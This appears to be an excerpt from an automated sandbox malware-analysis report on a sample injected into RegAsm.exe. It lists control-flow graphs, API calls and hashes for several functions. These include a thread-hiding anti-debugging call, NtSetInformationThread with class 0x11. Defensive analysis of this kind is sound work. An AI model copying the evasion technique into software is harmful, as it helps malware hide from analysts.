                                  control_flow_graph 460 f00631-f00a34 461 f00a3c-f00ae6 call f081cf call f045aa call f0949d call f04c36 call f081cf NtSetInformationThread call f081cf 460->461 462 f00a37 call f081cf 460->462 476 f00aeb-f00b00 461->476 462->461 477 f00b06-f00b2c call f08314 476->477 478 f03189-f031e1 call f03e58 476->478 477->476 483 f00b2e-f00b85 call f05811 call f04109 call f0519a call f081cf call f09eee 477->483 484 f031e6-f035ed 478->484 485 f031e1 call f03e58 478->485 516 f01078-f010d8 call f081cf * 2 call f09eee 483->516 517 f00b8b-f00bf3 call f081cf call f09eee 483->517 489 f035f3-f03620 call f09eee 484->489 490 f0452b-f04534 484->490 485->484 501 f03df6-f03dff 489->501 502 f03626-f03726 call f03fdf call f07d70 call f09eee 489->502 493 f04535-f0454c 490->493 493->493 496 f0454e-f045a2 493->496 503 f03e07-f03e51 call f09eee * 3 501->503 504 f03e02 call f09eee 501->504 502->501 529 f0372c-f03767 call f09eee 502->529 504->503 549 f08a84-f08f11 call f08799 call f08ab5 516->549 550 f010de-f010e8 call f07ce8 516->550 517->516 534 f00bf9-f00c05 517->534 529->501 538 f0376d-f037cc call f09eee 529->538 537 f00c0b-f00c2a call f082c4 534->537 546 f00c51-f00c56 537->546 547 f00c2c-f00c35 537->547 538->501 548 f037d2-f037d7 538->548 546->549 555 f00c5c-f01053 546->555 547->549 552 f00c3b-f00c40 547->552 548->501 553 f037dd-f03825 call f037f9 548->553 561 f010ea 550->561 562 f0110b-f01111 550->562 552->549 558 f00c46-f00c4b 552->558 572 f03834-f03840 553->572 573 f03827-f0382c 553->573 555->549 563 f01059-f0105e 555->563 558->546 558->549 567 f010f4-f010fe call f03189 561->567 569 f01117-f01143 call f01864 call f07d70 call f017bf 562->569 570 f011af-f011b9 562->570 563->549 568 f01064-f01069 563->568 588 f01100-f01104 567->588 568->549 575 f0106f-f01072 568->575 576 f0062c-f00a37 call f081cf 569->576 615 f01149-f0114d 569->615 570->576 577 f011bf-f011c4 570->577 572->501 586 f03841-f0388e call f08314 572->586 573->501 585 f03832 573->585 575->516 575->537 576->461 582 f011c6-f011ca 577->582 583 f011de-f011eb 577->583 590 f011d9 call f01d3f 582->590 591 f011cc-f011d7 call f01864 582->591 593 f05a43-f05a52 call f011f0 583->593 594 f040a3-f04108 call f09eee 583->594 585->572 586->501 603 f03894-f03919 call f0452b call f038d6 586->603 588->594 590->583 591->583 591->590 606 f05a56 593->606 607 f05abf-f05ac6 call f052b9 593->607 603->501 636 f0391f-f03957 call f09eee 603->636 611 f05a58-f05a7f 606->611 612 f05abd-f05abe 606->612 624 f05b31-f05f1a 607->624 625 f05ac8-f05ae3 607->625 621 f05a82-f05aac 611->621 622 f05ae7-f05aee 611->622 612->607 615->570 619 f0114f-f011ae call f0949d call f01719 call f01dbc 615->619 619->570 629 f05ae4 621->629 637 f05aae-f05ac6 call f05200 621->637 630 f05af0-f05b1e 622->630 631 f05b1f-f05b2c 622->631 625->629 629->622 630->631 631->624 636->501 645 f0395d-f03d99 call f09eee 636->645 637->624 637->625 645->501 649 f03d9b-f03dd3 call f09eee * 2 645->649
                                  APIs
                                    • Part of subcall function 00F081CF: LoadLibraryA.KERNEL32(?,B769339E,?,00F00A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00F004BD,00000000), ref: 00F0822B
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00F00AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T
                                  • API String ID: 543350213-3147410236
                                  • Opcode ID: 075b58a0557ade9534a3dec0b9382b3f104376bb3c31c7d4d482421de13dbc5e
                                  • Instruction ID: e484142993a572a07505ebc82e0b781c011902aa697f42112058c028315f2482
                                  • Opcode Fuzzy Hash: 075b58a0557ade9534a3dec0b9382b3f104376bb3c31c7d4d482421de13dbc5e
                                  • Instruction Fuzzy Hash: 89E1DA93E1E5147FE6A04D29E8E23AEA2D20750350FB8D1099E51AF78DE7ACFC4653C0
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Function 00F011F0, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 295nativethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 654 f011f0-f01228 call f09447 657 f0062c-f00ae6 call f081cf * 2 call f045aa call f0949d call f04c36 call f081cf NtSetInformationThread call f081cf 654->657 658 f0122e-f0122f 654->658 692 f00aeb-f00b00 657->692 660 f01235-f0125a call f0521f 658->660 666 f01260-f0168a call f093ed 660->666 667 f01696-f016b1 call f016be 660->667 666->657 676 f01690-f01691 call f01e6c 666->676 667->660 680 f040a3-f04108 call f09eee 667->680 676->667 693 f00b06-f00b2c call f08314 692->693 694 f03189-f031e1 call f03e58 692->694 693->692 699 f00b2e-f00b85 call f05811 call f04109 call f0519a call f081cf call f09eee 693->699 700 f031e6-f035ed 694->700 701 f031e1 call f03e58 694->701 732 f01078-f010d8 call f081cf * 2 call f09eee 699->732 733 f00b8b-f00bf3 call f081cf call f09eee 699->733 705 f035f3-f03620 call f09eee 700->705 706 f0452b-f04534 700->706 701->700 717 f03df6-f03dff 705->717 718 f03626-f03726 call f03fdf call f07d70 call f09eee 705->718 709 f04535-f0454c 706->709 709->709 712 f0454e-f045a2 709->712 719 f03e07-f03e51 call f09eee * 3 717->719 720 f03e02 call f09eee 717->720 718->717 745 f0372c-f03767 call f09eee 718->745 720->719 765 f08a84-f08f11 call f08799 call f08ab5 732->765 766 f010de-f010e8 call f07ce8 732->766 733->732 750 f00bf9-f00c05 733->750 745->717 754 f0376d-f037cc call f09eee 745->754 753 f00c0b-f00c2a call f082c4 750->753 762 f00c51-f00c56 753->762 763 f00c2c-f00c35 753->763 754->717 764 f037d2-f037d7 754->764 762->765 771 f00c5c-f01053 762->771 763->765 768 f00c3b-f00c40 763->768 764->717 769 f037dd-f03825 call f037f9 764->769 777 f010ea 766->777 778 f0110b-f01111 766->778 768->765 774 f00c46-f00c4b 768->774 788 f03834-f03840 769->788 789 f03827-f0382c 769->789 771->765 779 f01059-f0105e 771->779 774->762 774->765 783 f010f4-f010fe call f03189 777->783 785 f01117-f01143 call f01864 call f07d70 call f017bf 778->785 786 f011af-f011b9 778->786 779->765 784 f01064-f01069 779->784 802 f01100-f01104 783->802 784->765 791 f0106f-f01072 784->791 785->657 824 f01149-f0114d 785->824 786->657 792 f011bf-f011c4 786->792 788->717 800 f03841-f0388e call f08314 788->800 789->717 799 f03832 789->799 791->732 791->753 796 f011c6-f011ca 792->796 797 f011de-f011eb 792->797 803 f011d9 call f01d3f 796->803 804 f011cc-f011d7 call f01864 796->804 797->680 806 f05a43-f05a52 call f011f0 797->806 799->788 800->717 813 f03894-f03919 call f0452b call f038d6 800->813 802->680 803->797 804->797 804->803 816 f05a56 806->816 817 f05abf-f05ac6 call f052b9 806->817 813->717 845 f0391f-f03957 call f09eee 813->845 820 f05a58-f05a7f 816->820 821 f05abd-f05abe 816->821 833 f05b31-f05f1a 817->833 834 f05ac8-f05ae3 817->834 830 f05a82-f05aac 820->830 831 f05ae7-f05aee 820->831 821->817 824->786 828 f0114f-f011ae call f0949d call f01719 call f01dbc 824->828 828->786 838 f05ae4 830->838 846 f05aae-f05ac6 call f05200 830->846 839 f05af0-f05b1e 831->839 840 f05b1f-f05b2c 831->840 834->838 838->831 839->840 840->833 845->717 854 f0395d-f03d99 call f09eee 845->854 846->833 846->834 854->717 858 f03d9b-f03dd3 call f09eee * 2 854->858
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00F00AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T
                                  • API String ID: 4046476035-3147410236
                                  • Opcode ID: be423587d4f69cb26d68848b99c0aff552a16ecf015ed77986f47de5f307b8fb
                                  • Instruction ID: 6a1a5d4619e0ffb2d2eab1a66888287c63953659477df0ad3e059f9f1b4dc970
                                  • Opcode Fuzzy Hash: be423587d4f69cb26d68848b99c0aff552a16ecf015ed77986f47de5f307b8fb
                                  • Instruction Fuzzy Hash: 43915974B40305AFEF306EA48C96BDA3753AF427A0F64411AFD85971C1DFB9C886B612
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Function 00F01719, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 290nativethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 863 f01719-f0176f call f09eee * 2 868 f01775-f017ba call f09eee * 2 863->868 869 f0062c-f00ae6 call f081cf * 2 call f045aa call f0949d call f04c36 call f081cf NtSetInformationThread call f081cf 863->869 878 f040a3-f04108 call f09eee 868->878 894 f00aeb-f00b00 869->894 895 f00b06-f00b2c call f08314 894->895 896 f03189-f031e1 call f03e58 894->896 895->894 901 f00b2e-f00b85 call f05811 call f04109 call f0519a call f081cf call f09eee 895->901 902 f031e6-f035ed 896->902 903 f031e1 call f03e58 896->903 934 f01078-f010d8 call f081cf * 2 call f09eee 901->934 935 f00b8b-f00bf3 call f081cf call f09eee 901->935 907 f035f3-f03620 call f09eee 902->907 908 f0452b-f04534 902->908 903->902 919 f03df6-f03dff 907->919 920 f03626-f03726 call f03fdf call f07d70 call f09eee 907->920 911 f04535-f0454c 908->911 911->911 914 f0454e-f045a2 911->914 921 f03e07-f03e51 call f09eee * 3 919->921 922 f03e02 call f09eee 919->922 920->919 947 f0372c-f03767 call f09eee 920->947 922->921 967 f08a84-f08f11 call f08799 call f08ab5 934->967 968 f010de-f010e8 call f07ce8 934->968 935->934 952 f00bf9-f00c05 935->952 947->919 956 f0376d-f037cc call f09eee 947->956 955 f00c0b-f00c2a call f082c4 952->955 964 f00c51-f00c56 955->964 965 f00c2c-f00c35 955->965 956->919 966 f037d2-f037d7 956->966 964->967 973 f00c5c-f01053 964->973 965->967 970 f00c3b-f00c40 965->970 966->919 971 f037dd-f03825 call f037f9 966->971 979 f010ea 968->979 980 f0110b-f01111 968->980 970->967 976 f00c46-f00c4b 970->976 990 f03834-f03840 971->990 991 f03827-f0382c 971->991 973->967 981 f01059-f0105e 973->981 976->964 976->967 985 f010f4-f010fe call f03189 979->985 987 f01117-f01143 call f01864 call f07d70 call f017bf 980->987 988 f011af-f011b9 980->988 981->967 986 f01064-f01069 981->986 1004 f01100-f01104 985->1004 986->967 993 f0106f-f01072 986->993 987->869 1026 f01149-f0114d 987->1026 988->869 994 f011bf-f011c4 988->994 990->919 1002 f03841-f0388e call f08314 990->1002 991->919 1001 f03832 991->1001 993->934 993->955 998 f011c6-f011ca 994->998 999 f011de-f011eb 994->999 1005 f011d9 call f01d3f 998->1005 1006 f011cc-f011d7 call f01864 998->1006 999->878 1008 f05a43-f05a52 call f011f0 999->1008 1001->990 1002->919 1015 f03894-f03919 call f0452b call f038d6 1002->1015 1004->878 1005->999 1006->999 1006->1005 1018 f05a56 1008->1018 1019 f05abf-f05ac6 call f052b9 1008->1019 1015->919 1047 f0391f-f03957 call f09eee 1015->1047 1022 f05a58-f05a7f 1018->1022 1023 f05abd-f05abe 1018->1023 1035 f05b31-f05f1a 1019->1035 1036 f05ac8-f05ae3 1019->1036 1032 f05a82-f05aac 1022->1032 1033 f05ae7-f05aee 1022->1033 1023->1019 1026->988 1030 f0114f-f011ae call f0949d call f01719 call f01dbc 1026->1030 1030->988 1040 f05ae4 1032->1040 1048 f05aae-f05ac6 call f05200 1032->1048 1041 f05af0-f05b1e 1033->1041 1042 f05b1f-f05b2c 1033->1042 1036->1040 1040->1033 1041->1042 1042->1035 1047->919 1056 f0395d-f03d99 call f09eee 1047->1056 1048->1035 1048->1036 1056->919 1060 f03d9b-f03dd3 call f09eee * 2 1056->1060
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00F00AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T
                                  • API String ID: 4046476035-3147410236
                                  • Opcode ID: ae82644baae1b2402e6816c366610ef02a75366e36d6af6e31ebde68cc31dee5
                                  • Instruction ID: 4ed075508648dfc69010a51a4d5c1dc89fa5b8b2f17082b610cd0c417b48bb02
                                  • Opcode Fuzzy Hash: ae82644baae1b2402e6816c366610ef02a75366e36d6af6e31ebde68cc31dee5
                                  • Instruction Fuzzy Hash: D1918970F40305AAFF306E64CC96BDA3653AF867A0F640129FD84971C1DFB89C8AB615
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Function 00F00629, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 234nativethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1065 f00629 1066 f0062c-f00ae6 call f081cf * 2 call f045aa call f0949d call f04c36 call f081cf NtSetInformationThread call f081cf 1065->1066 1083 f00aeb-f00b00 1066->1083 1084 f00b06-f00b2c call f08314 1083->1084 1085 f03189-f031e1 call f03e58 1083->1085 1084->1083 1090 f00b2e-f00b85 call f05811 call f04109 call f0519a call f081cf call f09eee 1084->1090 1091 f031e6-f035ed 1085->1091 1092 f031e1 call f03e58 1085->1092 1123 f01078-f010d8 call f081cf * 2 call f09eee 1090->1123 1124 f00b8b-f00bf3 call f081cf call f09eee 1090->1124 1096 f035f3-f03620 call f09eee 1091->1096 1097 f0452b-f04534 1091->1097 1092->1091 1108 f03df6-f03dff 1096->1108 1109 f03626-f03726 call f03fdf call f07d70 call f09eee 1096->1109 1100 f04535-f0454c 1097->1100 1100->1100 1103 f0454e-f045a2 1100->1103 1110 f03e07-f03e51 call f09eee * 3 1108->1110 1111 f03e02 call f09eee 1108->1111 1109->1108 1136 f0372c-f03767 call f09eee 1109->1136 1111->1110 1156 f08a84-f08f11 call f08799 call f08ab5 1123->1156 1157 f010de-f010e8 call f07ce8 1123->1157 1124->1123 1141 f00bf9-f00c05 1124->1141 1136->1108 1145 f0376d-f037cc call f09eee 1136->1145 1144 f00c0b-f00c2a call f082c4 1141->1144 1153 f00c51-f00c56 1144->1153 1154 f00c2c-f00c35 1144->1154 1145->1108 1155 f037d2-f037d7 1145->1155 1153->1156 1162 f00c5c-f01053 1153->1162 1154->1156 1159 f00c3b-f00c40 1154->1159 1155->1108 1160 f037dd-f03825 call f037f9 1155->1160 1168 f010ea 1157->1168 1169 f0110b-f01111 1157->1169 1159->1156 1165 f00c46-f00c4b 1159->1165 1179 f03834-f03840 1160->1179 1180 f03827-f0382c 1160->1180 1162->1156 1170 f01059-f0105e 1162->1170 1165->1153 1165->1156 1174 f010f4-f010fe call f03189 1168->1174 1176 f01117-f01143 call f01864 call f07d70 call f017bf 1169->1176 1177 f011af-f011b9 1169->1177 1170->1156 1175 f01064-f01069 1170->1175 1193 f01100-f01104 1174->1193 1175->1156 1182 f0106f-f01072 1175->1182 1176->1066 1219 f01149-f0114d 1176->1219 1177->1066 1183 f011bf-f011c4 1177->1183 1179->1108 1191 f03841-f0388e call f08314 1179->1191 1180->1108 1190 f03832 1180->1190 1182->1123 1182->1144 1187 f011c6-f011ca 1183->1187 1188 f011de-f011eb 1183->1188 1194 f011d9 call f01d3f 1187->1194 1195 f011cc-f011d7 call f01864 1187->1195 1197 f05a43-f05a52 call f011f0 1188->1197 1198 f040a3-f04108 call f09eee 1188->1198 1190->1179 1191->1108 1207 f03894-f03919 call f0452b call f038d6 1191->1207 1193->1198 1194->1188 1195->1188 1195->1194 1210 f05a56 1197->1210 1211 f05abf-f05ac6 call f052b9 1197->1211 1207->1108 1240 f0391f-f03957 call f09eee 1207->1240 1215 f05a58-f05a7f 1210->1215 1216 f05abd-f05abe 1210->1216 1228 f05b31-f05f1a 1211->1228 1229 f05ac8-f05ae3 1211->1229 1225 f05a82-f05aac 1215->1225 1226 f05ae7-f05aee 1215->1226 1216->1211 1219->1177 1223 f0114f-f011ae call f0949d call f01719 call f01dbc 1219->1223 1223->1177 1233 f05ae4 1225->1233 1241 f05aae-f05ac6 call f05200 1225->1241 1234 f05af0-f05b1e 1226->1234 1235 f05b1f-f05b2c 1226->1235 1229->1233 1233->1226 1234->1235 1235->1228 1240->1108 1249 f0395d-f03d99 call f09eee 1240->1249 1241->1228 1241->1229 1249->1108 1253 f03d9b-f03dd3 call f09eee * 2 1249->1253
                                  APIs
                                    • Part of subcall function 00F081CF: LoadLibraryA.KERNEL32(?,B769339E,?,00F00A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00F004BD,00000000), ref: 00F0822B
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00F00AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T
                                  • API String ID: 543350213-3147410236
                                  • Opcode ID: 26056ae46e39905a1e3d51aefb313d98131d031c7a56edcbf01291416ea960fa
                                  • Instruction ID: 32c78f095d7919bba1b5574ebcc4dc73269df6708b387c3671adfac56e085aba
                                  • Opcode Fuzzy Hash: 26056ae46e39905a1e3d51aefb313d98131d031c7a56edcbf01291416ea960fa
                                  • Instruction Fuzzy Hash: 69614970F40305AAEF306A648CD6BDA36526F417A0F64412AFD85971C1CFBCD88AB615
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Function 00F00A7A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 219nativethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1258 f00a7a-f00a7c 1259 f00a87-f00ae6 call f0949d call f04c36 call f081cf NtSetInformationThread call f081cf 1258->1259 1260 f00a7e-f00a82 1258->1260 1269 f00aeb-f00b00 1259->1269 1260->1259 1270 f00b06-f00b2c call f08314 1269->1270 1271 f03189-f031e1 call f03e58 1269->1271 1270->1269 1276 f00b2e-f00b85 call f05811 call f04109 call f0519a call f081cf call f09eee 1270->1276 1277 f031e6-f035ed 1271->1277 1278 f031e1 call f03e58 1271->1278 1309 f01078-f010d8 call f081cf * 2 call f09eee 1276->1309 1310 f00b8b-f00bf3 call f081cf call f09eee 1276->1310 1282 f035f3-f03620 call f09eee 1277->1282 1283 f0452b-f04534 1277->1283 1278->1277 1294 f03df6-f03dff 1282->1294 1295 f03626-f03726 call f03fdf call f07d70 call f09eee 1282->1295 1286 f04535-f0454c 1283->1286 1286->1286 1289 f0454e-f045a2 1286->1289 1296 f03e07-f03e51 call f09eee * 3 1294->1296 1297 f03e02 call f09eee 1294->1297 1295->1294 1322 f0372c-f03767 call f09eee 1295->1322 1297->1296 1342 f08a84-f08f11 call f08799 call f08ab5 1309->1342 1343 f010de-f010e8 call f07ce8 1309->1343 1310->1309 1327 f00bf9-f00c05 1310->1327 1322->1294 1331 f0376d-f037cc call f09eee 1322->1331 1330 f00c0b-f00c2a call f082c4 1327->1330 1339 f00c51-f00c56 1330->1339 1340 f00c2c-f00c35 1330->1340 1331->1294 1341 f037d2-f037d7 1331->1341 1339->1342 1348 f00c5c-f01053 1339->1348 1340->1342 1345 f00c3b-f00c40 1340->1345 1341->1294 1346 f037dd-f03825 call f037f9 1341->1346 1354 f010ea 1343->1354 1355 f0110b-f01111 1343->1355 1345->1342 1351 f00c46-f00c4b 1345->1351 1365 f03834-f03840 1346->1365 1366 f03827-f0382c 1346->1366 1348->1342 1356 f01059-f0105e 1348->1356 1351->1339 1351->1342 1360 f010f4-f010fe call f03189 1354->1360 1362 f01117-f01143 call f01864 call f07d70 call f017bf 1355->1362 1363 f011af-f011b9 1355->1363 1356->1342 1361 f01064-f01069 1356->1361 1381 f01100-f01104 1360->1381 1361->1342 1368 f0106f-f01072 1361->1368 1369 f0062c-f00a69 call f081cf * 2 call f045aa 1362->1369 1412 f01149-f0114d 1362->1412 1363->1369 1370 f011bf-f011c4 1363->1370 1365->1294 1379 f03841-f0388e call f08314 1365->1379 1366->1294 1378 f03832 1366->1378 1368->1309 1368->1330 1369->1259 1375 f011c6-f011ca 1370->1375 1376 f011de-f011eb 1370->1376 1383 f011d9 call f01d3f 1375->1383 1384 f011cc-f011d7 call f01864 1375->1384 1386 f05a43-f05a52 call f011f0 1376->1386 1387 f040a3-f04108 call f09eee 1376->1387 1378->1365 1379->1294 1397 f03894-f03919 call f0452b call f038d6 1379->1397 1381->1387 1383->1376 1384->1376 1384->1383 1401 f05a56 1386->1401 1402 f05abf-f05ac6 call f052b9 1386->1402 1397->1294 1434 f0391f-f03957 call f09eee 1397->1434 1407 f05a58-f05a7f 1401->1407 1408 f05abd-f05abe 1401->1408 1422 f05b31-f05f1a 1402->1422 1423 f05ac8-f05ae3 1402->1423 1419 f05a82-f05aac 1407->1419 1420 f05ae7-f05aee 1407->1420 1408->1402 1412->1363 1417 f0114f-f011ae call f0949d call f01719 call f01dbc 1412->1417 1417->1363 1427 f05ae4 1419->1427 1435 f05aae-f05ac6 call f05200 1419->1435 1428 f05af0-f05b1e 1420->1428 1429 f05b1f-f05b2c 1420->1429 1423->1427 1427->1420 1428->1429 1429->1422 1434->1294 1443 f0395d-f03d99 call f09eee 1434->1443 1435->1422 1435->1423 1443->1294 1447 f03d9b-f03dd3 call f09eee * 2 1443->1447
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00F00AC8
                                    • Part of subcall function 00F081CF: LoadLibraryA.KERNEL32(?,B769339E,?,00F00A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00F004BD,00000000), ref: 00F0822B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T
                                  • API String ID: 543350213-3147410236
                                  • Opcode ID: 4d18b91f56fdd8792a63588e8d1d224e2a450ae394e87829301782603fa06be9
                                  • Instruction ID: 1cbba4a89c3b6965a055aa8ba7aa60d661366358a7d3dd82717cc610d90fd020
                                  • Opcode Fuzzy Hash: 4d18b91f56fdd8792a63588e8d1d224e2a450ae394e87829301782603fa06be9
                                  • Instruction Fuzzy Hash: 02516A70F40305AAFF345A649CD6BDA37066F427A0F68012AFD85971C1CFA9D88AB612
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Function 00F09EF3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86UNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1452 f09ef3-f09ef7 1453 f09ef8-f09f07 1452->1453 1453->1453 1454 f09f09-f0a709 call f08fc5 1453->1454 1459 f0a709 1454->1459 1460 f0062c-f00ae6 call f081cf * 2 call f045aa call f0949d call f04c36 call f081cf NtSetInformationThread call f081cf 1454->1460 1459->1460 1462 f0a70f-f0a715 1459->1462 1493 f00aeb-f00b00 1460->1493 1464 f0a71a-f0a721 1462->1464 1464->1464 1466 f0a723-f0a736 1464->1466 1468 f0a73b-f0a743 1466->1468 1468->1468 1470 f0a745-f0a769 1468->1470 1474 f0a7f4-f0a803 1470->1474 1475 f0a76f-f0a779 1470->1475 1475->1474 1477 f0a77b-f0a77f 1475->1477 1477->1474 1479 f0a781-f0a787 1477->1479 1479->1474 1481 f0a789-f0a78d 1479->1481 1481->1474 1483 f0a78f-f0a793 1481->1483 1483->1474 1485 f0a795-f0a799 1483->1485 1485->1474 1488 f0a79b-f0a7ab 1485->1488 1488->1460 1490 f0a7b1-f0a7bf 1488->1490 1490->1474 1492 f0a7c1-f0a7c9 1490->1492 1492->1474 1494 f0a7cb-f0a7d6 1492->1494 1495 f00b06-f00b2c call f08314 1493->1495 1496 f03189-f031e1 call f03e58 1493->1496 1494->1474 1497 f0a7d8-f0a7dd CreateFileW 1494->1497 1495->1493 1504 f00b2e-f00b85 call f05811 call f04109 call f0519a call f081cf call f09eee 1495->1504 1505 f031e6-f035ed 1496->1505 1506 f031e1 call f03e58 1496->1506 1499 f0a7e0-f0a7e8 1497->1499 1499->1499 1502 f0a7ea-f0a825 1499->1502 1513 f0a827 1502->1513 1514 f0a7cf-f0a7d6 1502->1514 1540 f01078-f010d8 call f081cf * 2 call f09eee 1504->1540 1541 f00b8b-f00bf3 call f081cf call f09eee 1504->1541 1511 f035f3-f03620 call f09eee 1505->1511 1512 f0452b-f04534 1505->1512 1506->1505 1525 f03df6-f03dff 1511->1525 1526 f03626-f03726 call f03fdf call f07d70 call f09eee 1511->1526 1517 f04535-f0454c 1512->1517 1513->1513 1514->1474 1514->1497 1517->1517 1520 f0454e-f045a2 1517->1520 1527 f03e07-f03e51 call f09eee * 3 1525->1527 1528 f03e02 call f09eee 1525->1528 1526->1525 1553 f0372c-f03767 call f09eee 1526->1553 1528->1527 1573 f08a84-f08f11 call f08799 call f08ab5 1540->1573 1574 f010de-f010e8 call f07ce8 1540->1574 1541->1540 1558 f00bf9-f00c05 1541->1558 1553->1525 1562 f0376d-f037cc call f09eee 1553->1562 1561 f00c0b-f00c2a call f082c4 1558->1561 1570 f00c51-f00c56 1561->1570 1571 f00c2c-f00c35 1561->1571 1562->1525 1572 f037d2-f037d7 1562->1572 1570->1573 1579 f00c5c-f01053 1570->1579 1571->1573 1576 f00c3b-f00c40 1571->1576 1572->1525 1577 f037dd-f03825 call f037f9 1572->1577 1585 f010ea 1574->1585 1586 f0110b-f01111 1574->1586 1576->1573 1582 f00c46-f00c4b 1576->1582 1596 f03834-f03840 1577->1596 1597 f03827-f0382c 1577->1597 1579->1573 1587 f01059-f0105e 1579->1587 1582->1570 1582->1573 1591 f010f4-f010fe call f03189 1585->1591 1593 f01117-f01143 call f01864 call f07d70 call f017bf 1586->1593 1594 f011af-f011b9 1586->1594 1587->1573 1592 f01064-f01069 1587->1592 1610 f01100-f01104 1591->1610 1592->1573 1599 f0106f-f01072 1592->1599 1593->1460 1636 f01149-f0114d 1593->1636 1594->1460 1600 f011bf-f011c4 1594->1600 1596->1525 1608 f03841-f0388e call f08314 1596->1608 1597->1525 1607 f03832 1597->1607 1599->1540 1599->1561 1604 f011c6-f011ca 1600->1604 1605 f011de-f011eb 1600->1605 1611 f011d9 call f01d3f 1604->1611 1612 f011cc-f011d7 call f01864 1604->1612 1614 f05a43-f05a52 call f011f0 1605->1614 1615 f040a3-f04108 call f09eee 1605->1615 1607->1596 1608->1525 1624 f03894-f03919 call f0452b call f038d6 1608->1624 1610->1615 1611->1605 1612->1605 1612->1611 1627 f05a56 1614->1627 1628 f05abf-f05ac6 call f052b9 1614->1628 1624->1525 1657 f0391f-f03957 call f09eee 1624->1657 1632 f05a58-f05a7f 1627->1632 1633 f05abd-f05abe 1627->1633 1645 f05b31-f05f1a 1628->1645 1646 f05ac8-f05ae3 1628->1646 1642 f05a82-f05aac 1632->1642 1643 f05ae7-f05aee 1632->1643 1633->1628 1636->1594 1640 f0114f-f011ae call f0949d call f01719 call f01dbc 1636->1640 1640->1594 1650 f05ae4 1642->1650 1658 f05aae-f05ac6 call f05200 1642->1658 1651 f05af0-f05b1e 1643->1651 1652 f05b1f-f05b2c 1643->1652 1646->1650 1650->1643 1651->1652 1652->1645 1657->1525 1666 f0395d-f03d99 call f09eee 1657->1666 1658->1645 1658->1646 1666->1525 1670 f03d9b-f03dd3 call f09eee * 2 1666->1670
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 1.!T
                                  • API String ID: 0-3147410236
                                  • Opcode ID: 3354b6e6c4ee9e5599cef383cbfd7b4a2cffadf4d1ffec653b6aa3ce2308c8d6
                                  • Instruction ID: fd6834105e18a59f9c6097c6cc47e15d9afe35ba0a9b0b383f7876e65cd5e817
                                  • Opcode Fuzzy Hash: 3354b6e6c4ee9e5599cef383cbfd7b4a2cffadf4d1ffec653b6aa3ce2308c8d6
                                  • Instruction Fuzzy Hash: 66210AB5B40306AEEF30AE748D61BDD36C28F84760FB48126BE416B2C4DE78D8437615
